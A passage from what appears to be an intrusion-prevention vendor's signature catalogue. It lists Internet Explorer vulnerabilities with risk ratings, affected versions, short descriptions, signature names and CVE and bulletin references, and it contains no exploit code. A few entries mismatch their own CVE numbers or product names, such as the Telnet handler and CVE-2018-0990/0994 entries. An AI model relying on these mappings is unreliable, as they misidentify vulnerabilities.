Description: A memory corruption vulnerability exists in Microsoft Internet Explorer. The vulnerability is due a design error in the TDCCtl ActiveX Control in the handling of long URLs. A remote attacker can exploit this vulnerability by enticing a target user to open a maliciously crafted HTML document. In a sophisticated attack where code execution is successful, the behaviour of the target host is entirely dependent on the intended function of the injected code. The code in this case would execute within the security context of the currently logged in user. If such an attack is not executed successfully, the vulnerable application may terminate abnormally.
Situation: File-Text_Microsoft-Internet-Explorer-Tabular-Data-Control-Memory-Corruption
References:
CVE-2010-0805
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0805
BID-39025
http://www.securityfocus.com/bid/39025
MS10-018
http://technet.microsoft.com/security/bulletin/MS10-018
Back to top

Microsoft-Internet-Explorer-Telnet-Handler-Code-Execution-CVE-2011-1257

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-406-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A vulnerability in Microsoft Internet Explorer
Situation: HTTP_SS-Microsoft-Internet-Explorer-Telnet-Handler-Code-Execution-CVE-2011-1257
File-Text_MS-Internet-Explorer-Telnet-Handler-Code-Execution-CVE-2011-1257
References:
CVE-2011-1961
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1961
MS11-057
http://technet.microsoft.com/security/bulletin/MS11-057
Back to top

Microsoft-Internet-Explorer-Textrange-Memory-Corruption-CVE-2015-6154

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-711-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 8.0;
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Textrange-Memory-Corruption-CVE-2015-6154
References:
CVE-2015-6154
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6154
MS15-124
http://technet.microsoft.com/security/bulletin/MS15-124
Back to top

Microsoft-Internet-Explorer-Textrange-Object-Memory-Corruption

About this vulnerability: A memory corruption vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-162-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Integer Overflow
Description: There is a memory corruption vulnerability in Microsoft Internet Explorer. The vulnerability is due to an integer overflow error when storing a text string, which leads to memory corruption in the browser. Remote unauthenticated attackers could exploit this vulnerability by persuading a target user to visit a specially crafted Web site. Successful exploitation causes memory corruption that may lead to arbitrary code execution in the security context of the logged in user.
Situation: HTTP_SS-Microsoft-Internet-Explorer-Textrange-Object-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Textrange-Object-Memory-Corruption
References:
CVE-2008-2255
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2255
BID-28295
http://www.securityfocus.com/bid/28295
MS08-045
http://technet.microsoft.com/security/bulletin/MS08-045
Back to top

Microsoft-Internet-Explorer-Time-Element-CVE-2011-1255

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-396-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP; Windows 2003; Windows Vista; Windows 2008; Windows 7; Windows 2008 R2
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0
Type: Malfunction
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: HTTP_SS-Microsoft-Internet-Explorer-Time-Element-CVE-2011-1255
File-Text_Microsoft-Internet-Explorer-Time-Element-CVE-2011-1255
References:
CVE-2011-1255
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1255
OSVDB-72947
http://www.osvdb.org/72947
MS11-050
http://technet.microsoft.com/security/bulletin/MS11-050
Back to top

Microsoft-Internet-Explorer-Time-Element-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-1733-5242
Platform: Generic
Software: Internet Explorer
Type: Malfunction
Description: A remote code execution vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to the way in which HTML+Time elements are processed, and can result in access to an object that is not initialized, or has already been deleted. By enticing a target user to view a maliciously crafted web page, a remote attacker could exploit this vulnerability to run arbitrary code in the security context of the current user.
Situation: HTTP_SS-Microsoft-Internet-Explorer-Time-Element-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Time-Element-CVE-2011-1255
References:
CVE-2011-1255
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1255
OSVDB-72947
http://www.osvdb.org/72947
MS11-050
http://technet.microsoft.com/security/bulletin/MS11-050
Back to top

Microsoft-Internet-Explorer-Title-Element-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-826-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0
Type: Malfunction
Description: There exists a remote code execution vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Title-Element-Use-After-Free
References:
CVE-2012-1877
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1877
OSVDB-82867
http://www.osvdb.org/82867
MS12-037
http://technet.microsoft.com/security/bulletin/MS12-037
Back to top

Microsoft-Internet-Explorer-toJSON-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-1216-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There exists a vulnerability in Microsoft Internet Explorer, versions 9, 10, and 11, which allows remote attackers to execute arbitrary code by sending a target user a specially crafted web page or document, due to an error while handling certain objects when processing script code.
Situation: File-Text_Microsoft-Internet-Explorer-toJSON-Use-After-Free
References:
CVE-2019-1429
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1429
Back to top

Microsoft-Internet-Explorer-toStaticHTML-Cross-Site-Scripting

About this vulnerability: A cross site scripting vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-327-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Cross-site Scripting
Description: There is a cross site scripting vulnerability in Microsoft Internet Explorer. By enticing the target user to view a web page that uses the "toStaticHTML" method maliciously, a remote attacker can disclose sensitive information or execute arbitrary script code within the context of the target user's browser.
Situation: HTTP_SS-Microsoft-Internet-Explorer-toStaticHTML-Cross-Site-Scripting
File-Text_Microsoft-Internet-Explorer-toStaticHTML-Cross-Site-Scripting
References:
CVE-2010-1257
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1257
BID-40409
http://www.securityfocus.com/bid/40409
OSVDB-65211
http://www.osvdb.org/65211
MS10-039
http://technet.microsoft.com/security/bulletin/MS10-039
MS10-035
http://technet.microsoft.com/security/bulletin/MS10-035
Back to top

Microsoft-Internet-Explorer-toStaticHTML-Disclosure-CVE-2011-1252

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-396-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP; Windows 2003; Windows Vista; Windows 2008; Windows 7; Windows 2008 R2
Software: Internet Explorer 7.0; Internet Explorer 8.0
Type: Malfunction
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: HTTP_SS-Microsoft-Internet-Explorer-toStaticHTML-Disclosure-CVE-2011-1252
File-Text_Microsoft-Internet-Explorer-toStaticHTML-Disclosure-CVE-2011-1252
References:
CVE-2011-1252
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1252
MS11-050
http://technet.microsoft.com/security/bulletin/MS11-050
Back to top

Microsoft-Internet-Explorer-TSUserEX.DLL-ActiveX-Control-Vulnerability

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-585-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0
Type: Input Validation
Description: There is a vulnerability in Internet Explorer 6.0 that can be triggered by instantiating the TSUserEX.DLL ActiveX Control.
Situation: File-Text_Microsoft-Internet-Explorer-TSUserEX.DLL-ActiveX-Control-Vulnerability
References:
CVE-2006-4219
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4219
BID-19570
http://www.securityfocus.com/bid/19570
OSVDB-29351
http://www.osvdb.org/29351
Back to top

Microsoft-Internet-Explorer-Type-Confusion-Vulnerability-CVE-2018-8114

About this vulnerability: A vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-1065-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Type Confusion
Description: There has been reported a type confusion vulnerability in Microsoft Internet Explorer 11. A remote attacker could exploit this vulnerability by having a target user open a maliciously crafted document. Successful exploitation could lead to remote code execution.
Situation: File-Text_Microsoft-Internet-Explorer-Type-Confusion-Vulnerability-CVE-2018-8114
References:
CVE-2018-8114
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8114
ms18-may
http://technet.microsoft.com/security/bulletin/ms18-may
Back to top

Microsoft-Internet-Explorer-Type-Confusion-Vulnerability-CVE-2018-8122

About this vulnerability: A vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-1065-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Type Confusion
Description: There has been reported a type confusion vulnerability in Microsoft Internet Explorer 11. A remote attacker could exploit this vulnerability by having a target user open a maliciously crafted document. Successful exploitation could lead to remote code execution.
Situation: File-Text_Microsoft-Internet-Explorer-Type-Confusion-Vulnerability-CVE-2018-8122
References:
CVE-2018-8122
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8122
ms18-may
http://technet.microsoft.com/security/bulletin/ms18-may
Back to top

Microsoft-Internet-Explorer-Type-Confusion-Vulnerability-CVE-2018-8279

About this vulnerability: A vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-1084-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Type Confusion
Description: There has been reported a type confusion vulnerability in Internet Explorer browser. A remote attacker could exploit this vulnerability by having a target user open a maliciously crafted document. Successful exploitation could lead to remote code execution.
Situation: File-Text_Microsoft-Internet-Explorer-Type-Confusion-Vulnerability-CVE-2018-8279
References:
CVE-2018-8279
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8279
ms18-jul
http://technet.microsoft.com/security/bulletin/ms18-jul
Back to top

Microsoft-Internet-Explorer-Type-Confusion-Vulnerability-CVE-2018-8283

About this vulnerability: A vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-1084-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Type Confusion
Description: There has been reported a type confusion vulnerability in Internet Explorer browser. A remote attacker could exploit this vulnerability by having a target user open a maliciously crafted document. Successful exploitation could lead to remote code execution.
Situation: File-Text_Microsoft-Internet-Explorer-Type-Confusion-Vulnerability-CVE-2018-8283
References:
CVE-2018-8283
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8283
ms18-jul
http://technet.microsoft.com/security/bulletin/ms18-jul
Back to top

Microsoft-Internet-Explorer-Type-Confusion-Vulnerability-CVE-2018-8291

About this vulnerability: A vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-1084-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Type Confusion
Description: There has been reported a type confusion vulnerability in Internet Explorer browser. A remote attacker could exploit this vulnerability by having a target user open a maliciously crafted document. Successful exploitation could lead to remote code execution.
Situation: File-Text_Microsoft-Internet-Explorer-Type-Confusion-Vulnerability-CVE-2018-8291
References:
CVE-2018-8291
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8291
ms18-jul
http://technet.microsoft.com/security/bulletin/ms18-jul
Back to top

Microsoft-Internet-Explorer-Type-Confusion-Vulnerability-CVE-2018-8298

About this vulnerability: A vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-1084-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Type Confusion
Description: There has been reported a type confusion vulnerability in Internet Explorer browser. A remote attacker could exploit this vulnerability by having a target user open a maliciously crafted document. Successful exploitation could lead to remote code execution.
Situation: File-Text_Microsoft-Internet-Explorer-Type-Confusion-Vulnerability-CVE-2018-8298
References:
CVE-2018-8298
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8298
ms18-jul
http://technet.microsoft.com/security/bulletin/ms18-jul
Back to top

Microsoft-Internet-Explorer-Uninitialized-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-234-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 5.0; Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0
Type: Malfunction
Description: There is a memory corruption vulnerability in Microsoft Internet Explorer.
Situation: HTTP_SS-Microsoft-Internet-Explorer-Uninitialized-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Uninitialized-Memory-Corruption
References:
CVE-2009-1919
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1919
MS09-034
http://technet.microsoft.com/security/bulletin/MS09-034
Back to top

Microsoft-Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2009-2530

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-257-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0
Type: Malfunction
Description: There is an uninitialized memory corruption vulnerability in Microsoft Internet Explorer. A successful attack may lead to arbitrary code execution in the context of the current user.
Situation: HTTP_SS-Microsoft-Internet-Explorer-Uninitialized-Memory-CVE-2009-2530
File-Text_Microsoft-Internet-Explorer-Uninitialized-Memory-CVE-2009-2530
References:
CVE-2009-2530
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2530
MS09-054
http://technet.microsoft.com/security/bulletin/MS09-054
Back to top

Microsoft-Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2009-2531

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-257-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0
Type: Malfunction
Description: There is an uninitialized memory corruption vulnerability in Microsoft Internet Explorer. A successful attack may lead to arbitrary code execution in the context of the current user.
Situation: HTTP_SS-Microsoft-Internet-Explorer-Uninitialized-Memory-CVE-2009-2531
File-Text_Microsoft-Internet-Explorer-Uninitialized-Memory-CVE-2009-2531
References:
CVE-2009-2531
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2531
MS09-054
http://technet.microsoft.com/security/bulletin/MS09-054
Back to top

Microsoft-Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2010-0244

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-279-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000; Windows XP; Windows 2003; Windows Vista; Windows 2008; Windows 7
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0
Type: Input Validation
Description: There is a remote code execution vulnerability in Microsoft Internet Explorer.
Situation: HTTP_SS-Microsoft-Internet-Explorer-Memory-Corruption-CVE-2010-0244
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2010-0244
References:
CVE-2010-0244
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0244
MS10-002
http://technet.microsoft.com/security/bulletin/MS10-002
Back to top

Microsoft-Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2010-0267

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0; Internet Explorer 7.0
Type: Malfunction
Description: A memory corruption vulnerability exists in Microsoft Internet Explorer. The vulnerability is due the way that Internet Explorer handles certain type of mouse movement events. A remote attacker can exploit this vulnerability by enticing a target user to open a maliciously crafted HTML document. In a sophisticated attack where code injection is successful, the behaviour of the target host is entirely dependent on the logic of the injected code. The injected code, in this case, would execute within the security context of the currently logged in user. If such an attack is not executed successfully, the vulnerable application may terminate abnormally.
Situation: File-Text_Microsoft-Ie-Memory-Corruption-CVE-2010-0267
References:
CVE-2010-0267
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0267
BID-39023
http://www.securityfocus.com/bid/39023
MS10-018
http://technet.microsoft.com/security/bulletin/MS10-018
Back to top

Microsoft-Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2010-3328

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-346-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0
Type: Malfunction
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: HTTP_SS-Microsoft-Internet-Explorer-Uninitialized-Memory-CVE-2010-3328
File-Text_Microsoft-Internet-Explorer-Uninitialized-Memory-CVE-2010-3328
File-Text_Microsoft-Internet-Explorer-Uninitialized-Memory-CVE-2010-3328-2
References:
CVE-2010-3328
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3328
BID-43705
http://www.securityfocus.com/bid/43705
MS10-071
http://technet.microsoft.com/security/bulletin/MS10-071
Back to top

Microsoft-Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2010-3329

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-346-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0
Type: Malfunction
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: HTTP_SS-Microsoft-HtmlDlgHelper-ActiveX-Component-Usage
File-Text_Microsoft-HtmlDlgHelper-ActiveX-Component-Usage
References:
CVE-2010-3329
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3329
BID-43706
http://www.securityfocus.com/bid/43706
MS10-071
http://technet.microsoft.com/security/bulletin/MS10-071
Back to top

Microsoft-Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2010-3331

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-346-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0
Type: Malfunction
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: HTTP_SS-Microsoft-Scriptlet-ActiveX-Component-Usage
File-Text_Microsoft-Scriptlet-ActiveX-Component-Usage
References:
CVE-2010-3331
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3331
MS10-071
http://technet.microsoft.com/security/bulletin/MS10-071
Back to top

Microsoft-Internet-Explorer-Uninitialized-Memory-CVE-2011-0036

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-376-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP; Windows 2003; Windows Vista; Windows 2008; Windows 2008 R2
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0
Type: Malfunction
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: HTTP_CSU-Microsoft-Internet-Explorer-Uninitialized-Memory-CVE-2011-0036
File-Text_CSU-Microsoft-Internet-Explorer-Uninitialized-Memory-CVE-2011-0036
References:
CVE-2011-0036
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0036
BID-46158
http://www.securityfocus.com/bid/46158
OSVDB-70832
http://www.osvdb.org/70832
MS11-003
http://technet.microsoft.com/security/bulletin/MS11-003
Back to top

Microsoft-Internet-Explorer-Uninitialized-Object-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A memory corruption vulnerability exists in Microsoft Internet Explorer web browser. The vulnerability is due to an error while accessing an object that has been already deleted or not initialized. This would result in accessing arbitrary memory content and can be exploited for code execution. Remote attackers can exploit this vulnerability by enticing target users to visit a malicious web page. Successful exploitation could result in execution of arbitrary code on the vulnerable system in the context of the logged-on user. The behaviour of the target machine is dependent on the intention of the malicious code. If such an attack is not executed successfully, the vulnerable application may terminate abnormally.
Situation: File-Text_Microsoft-Internet-Explorer-Uninitialized-Object-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Uninitialized-Object-Memory-Corruption-2
References:
CVE-2010-0490
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0490
BID-39031
http://www.securityfocus.com/bid/39031
MS10-018
http://technet.microsoft.com/security/bulletin/MS10-018
Back to top

Microsoft-Internet-Explorer-URI-Redirection-Security-Bypass

About this vulnerability: A security bypass vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-287-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There is a security bypass vulnerability in Microsoft Internet Explorer.
Situation: HTTP_SS-Microsoft-Internet-Explorer-URI-Redirection-Security-Bypass
HTTP_SHS-Microsoft-Internet-Explorer-URI-Redirection-Security-Bypass
File-Text_Microsoft-Internet-Explorer-URI-Redirection-Security-Bypass
References:
CVE-2010-0255
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0255
BID-38055
http://www.securityfocus.com/bid/38055
OSVDB-62156
http://www.osvdb.org/62156
MS10-035
http://technet.microsoft.com/security/bulletin/MS10-035
Back to top

Microsoft-Internet-Explorer-Url-Validation

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-281-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 5.0; Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: HTTP_SS-Microsoft-Internet-Explorer-Url-Validation
File-Text_Microsoft-Internet-Explorer-Url-Validation
References:
CVE-2010-0027
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0027
BID-37884
http://www.securityfocus.com/bid/37884
MS10-007
http://technet.microsoft.com/security/bulletin/MS10-007
Back to top

Microsoft-Internet-Explorer-US-Ascii-Most-Significant-Bit-Obfuscation

About this vulnerability: A vulnerability in Internet Explorer allows detection evasion
Risk: High
First detected in: sgpkg-ips-125-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Input Validation
Description: There is an input validation vulnerability in Microsoft Internet Explorer. While rendering HTML pages, Internet Explorer ignores the most significant bit from 8-bit US-ASCII characters, allowing evasion of detection devices.
Situation: HTTP_SS-Microsoft-Internet-Explorer-US-Ascii-Most-Significant-Bit-Obfuscation
File-Text_Microsoft-Internet-Explorer-US-Ascii-Most-Significant-Bit-Obfuscation
References:
CVE-2006-3227
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3227
OSVDB-28376
http://www.osvdb.org/28376
Back to top

Microsoft-Internet-Explorer-Use-After-Free-CVE-2010-3962

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-354-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: HTTP_SS-Microsoft-Internet-Explorer-Use-After-Free-CVE-2010-3962
HTTP_SS-Microsoft-Internet-Explorer-Use-After-Free-CVE-2010-3962-2
File-Text_Microsoft-Internet-Explorer-Use-After-Free-CVE-2010-3962
File-Text_Microsoft-Internet-Explorer-Use-After-Free-CVE-2010-3962-2
References:
CVE-2010-3962
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3962
BID-44536
http://www.securityfocus.com/bid/44536
OSVDB-68987
http://www.osvdb.org/68987
MS10-090
http://technet.microsoft.com/security/bulletin/MS10-090
Back to top

Microsoft-Internet-Explorer-Use-After-Free-CVE-2012-0170

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-826-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0; Internet Explorer 7.0
Type: Malfunction
Description: There exists a memory corruption vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Use-After-Free-CVE-2012-0170
References:
CVE-2012-0170
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0170
BID-52904
http://www.securityfocus.com/bid/52904
MS12-023
http://technet.microsoft.com/security/bulletin/MS12-023
Back to top

Microsoft-Internet-Explorer-Use-After-Free-CVE-2014-1776

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-579-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: A vulnerability has been reported in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Use-After-Free-CVE-2014-1776-2
File-Text_Microsoft-Internet-Explorer-Use-After-Free-CVE-2014-1776
References:
CVE-2014-1776
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1776
BID-67075
http://www.securityfocus.com/bid/67075
OSVDB-106311
http://www.osvdb.org/106311
MS14-021
http://technet.microsoft.com/security/bulletin/MS14-021
Back to top

Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-0955

About this vulnerability: A vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-1065-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Use-after-free
Description: There has been reported a use-after-free vulnerability in Microsoft Internet Explorer 11. A remote attacker could exploit this vulnerability by having a target user open a maliciously crafted document. Successful exploitation could lead to remote code execution.
Situation: File-Text_Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-0955
References:
CVE-2018-0955
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0955
ms18-may
http://technet.microsoft.com/security/bulletin/ms18-may
Back to top

Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-0990

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-1057-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Use-after-free
Description: There has been reported a use-after-free vulnerability in Microsoft Edge browser. A remote attacker could exploit this vulnerability by having a target user open a maliciously crafted document. Successful exploitation could lead to remote code execution.
Situation: File-Text_Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-0991
References:
CVE-2018-0990
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0990
ms18-apr
http://technet.microsoft.com/security/bulletin/ms18-apr
Back to top

Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-0991

About this vulnerability: A vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-1057-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Use-after-free
Description: There has been reported a use-after-free vulnerability in Internet Explorer browser. A remote attacker could exploit this vulnerability by having a target user open a maliciously crafted document. Successful exploitation could lead to remote code execution.
Situation: File-Text_Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-0991
References:
CVE-2018-0991
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0991
ms18-apr
http://technet.microsoft.com/security/bulletin/ms18-apr
Back to top

Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-0994

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-1057-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Use-after-free
Description: There has been reported a use-after-free vulnerability in Microsoft Edge browser. A remote attacker could exploit this vulnerability by having a target user open a maliciously crafted document. Successful exploitation could lead to remote code execution.
Situation: File-Text_Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-0994
References:
CVE-2018-0994
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0994
ms18-apr
http://technet.microsoft.com/security/bulletin/ms18-apr
Back to top

Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-1004

About this vulnerability: A vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-1057-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Use-after-free
Description: There has been reported a use-after-free vulnerability in Internet Explorer browser. A remote attacker could exploit this vulnerability by having a target user open a maliciously crafted document. Successful exploitation could lead to remote code execution.
Situation: File-Text_Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-1004
References:
CVE-2018-1004
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1004
ms18-apr
http://technet.microsoft.com/security/bulletin/ms18-apr
Back to top

Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-1018

